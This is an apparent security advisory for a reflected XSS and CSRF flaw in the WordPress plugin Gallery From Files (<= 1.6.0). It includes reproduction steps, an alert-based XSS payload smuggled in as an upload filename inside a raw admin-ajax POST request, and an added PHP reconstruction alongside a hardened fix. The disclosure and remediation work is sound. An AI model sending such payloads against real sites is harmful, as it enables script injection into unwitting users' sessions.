Source: wpexploit | Author: Satyender Yadav | WPEX-ID: 6BB4EB71-D702-4732-B01F-B723077D66CA
Published: May 26, 2021 - 12:00 a.m.

Gallery From Files <= 1.6.0 - Reflected Cross-Site Scripting (XSS)


CVSS3: 6.1 Medium
  Attack Vector:        NETWORK
  Attack Complexity:    LOW
  Privileges Required:  NONE
  User Interaction:     REQUIRED
  Scope:                CHANGED
  Confidentiality Impact: LOW
  Integrity Impact:     LOW
  Availability Impact:  NONE
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVSS2: 4.3 Medium
  Access Vector:        NETWORK
  Access Complexity:    MEDIUM
  Authentication:       NONE
  Confidentiality Impact: NONE
  Integrity Impact:     PARTIAL
  Availability Impact:  NONE
  Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

The plugin lets users upload images to the server, but the filename is not sanitized before it is output in the error message shown for an invalid extension, leading to a reflected Cross-Site Scripting issue. Because the upload handler performs no CSRF check, the same payload can also be delivered through a cross-site request.

Steps:

1. Rename any file to <img src=x onerror=alert(1337)>
2. Choose this file to upload and click the "upload selected file" button.
3. While the file is uploading, an alert box with the content "1337" pops up on screen.

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------245018834521283925753967681812
Content-Length: 506
Cookie: [any user or even unauthenticated]
Connection: close

-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="myfile[]"; filename="<img src onerror=alert(2)>"
Content-Type: image/png


-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="action"

gallery_from_files_595_fileupload
-----------------------------245018834521283925753967681812
Content-Disposition: form-data; name="filesName"

myfile
-----------------------------245018834521283925753967681812--
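The two root causes described above are a missing nonce/capability check on the admin-ajax handler and an unescaped filename flowing into the error response. The following is an added illustration, not the plugin's own code: a minimal reconstruction of the vulnerable pattern beside a hardened handler built from standard WordPress APIs (check_ajax_referer, current_user_can, sanitize_file_name, wp_check_filetype, esc_html, wp_send_json_error). The function names, the hook name gff_demo_fileupload, the nonce action gff_demo_upload and the allowed-extension list are assumptions chosen for the example.

```php
<?php
// Added example (not the plugin's code). Reconstructs the flaw class described
// in the advisory and shows the hardened equivalent. All names are assumptions.

// --- Vulnerable pattern: unsanitized filename echoed in an error message ---
function gff_demo_upload_vulnerable() {
    // No nonce and no capability check: any request to admin-ajax.php lands here,
    // which is what makes the CSRF delivery described above possible.
    foreach ( $_FILES['myfile']['name'] as $name ) {
        $ext = strtolower( pathinfo( $name, PATHINFO_EXTENSION ) );
        if ( ! in_array( $ext, array( 'jpg', 'jpeg', 'png', 'gif' ), true ) ) {
            // The attacker-controlled filename reaches the response unescaped.
            echo 'Invalid file extension: ' . $name;
            wp_die();
        }
    }
    wp_die();
}

// --- Hardened version ---
function gff_demo_upload_hardened() {
    // 1. CSRF: the request must carry a nonce issued to the legitimate upload
    //    page (assumed action name 'gff_demo_upload', field name 'security').
    check_ajax_referer( 'gff_demo_upload', 'security' );

    // 2. Authorization: unauthenticated or low-privilege users are refused.
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    if ( empty( $_FILES['myfile']['name'] ) || ! is_array( $_FILES['myfile']['name'] ) ) {
        wp_send_json_error( array( 'message' => 'No file supplied.' ), 400 );
    }

    $allowed = array( 'jpg', 'jpeg', 'png', 'gif' ); // assumed policy for the example

    foreach ( $_FILES['myfile']['name'] as $name ) {
        // 3. Normalise the untrusted filename before using it anywhere.
        $safe_name = sanitize_file_name( wp_unslash( $name ) );

        // 4. Validate the type with WordPress' extension/MIME table instead of a
        //    bare string suffix comparison.
        $type = wp_check_filetype( $safe_name );
        if ( ! $type['ext'] || ! in_array( strtolower( $type['ext'] ), $allowed, true ) ) {
            // 5. Escape on output. esc_html() neutralises markup in the name and
            //    wp_send_json_error() sets a JSON content type, so the browser
            //    never interprets the response as HTML.
            wp_send_json_error( array(
                'message' => sprintf( 'Invalid file extension for %s', esc_html( $safe_name ) ),
            ), 400 );
        }

        // wp_handle_upload() would process the accepted file here.
    }

    wp_send_json_success( array( 'message' => 'Upload accepted.' ) );
}

// Hook name is an assumption for this example. Only logged-in users can reach
// 'wp_ajax_*' actions; 'wp_ajax_nopriv_*' is deliberately not registered.
add_action( 'wp_ajax_gff_demo_fileupload', 'gff_demo_upload_hardened' );

// The matching nonce is emitted where the upload form is rendered, e.g.
// wp_nonce_field( 'gff_demo_upload', 'security' );
```

The hardened handler fixes both reported weaknesses independently: the nonce and capability checks close the CSRF delivery path, and escaping at the output sink (plus the JSON content type) removes the reflected XSS even if a future change reintroduces a raw filename into a message. Sanitizing the name on input is defence in depth, not a substitute for escaping on output.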
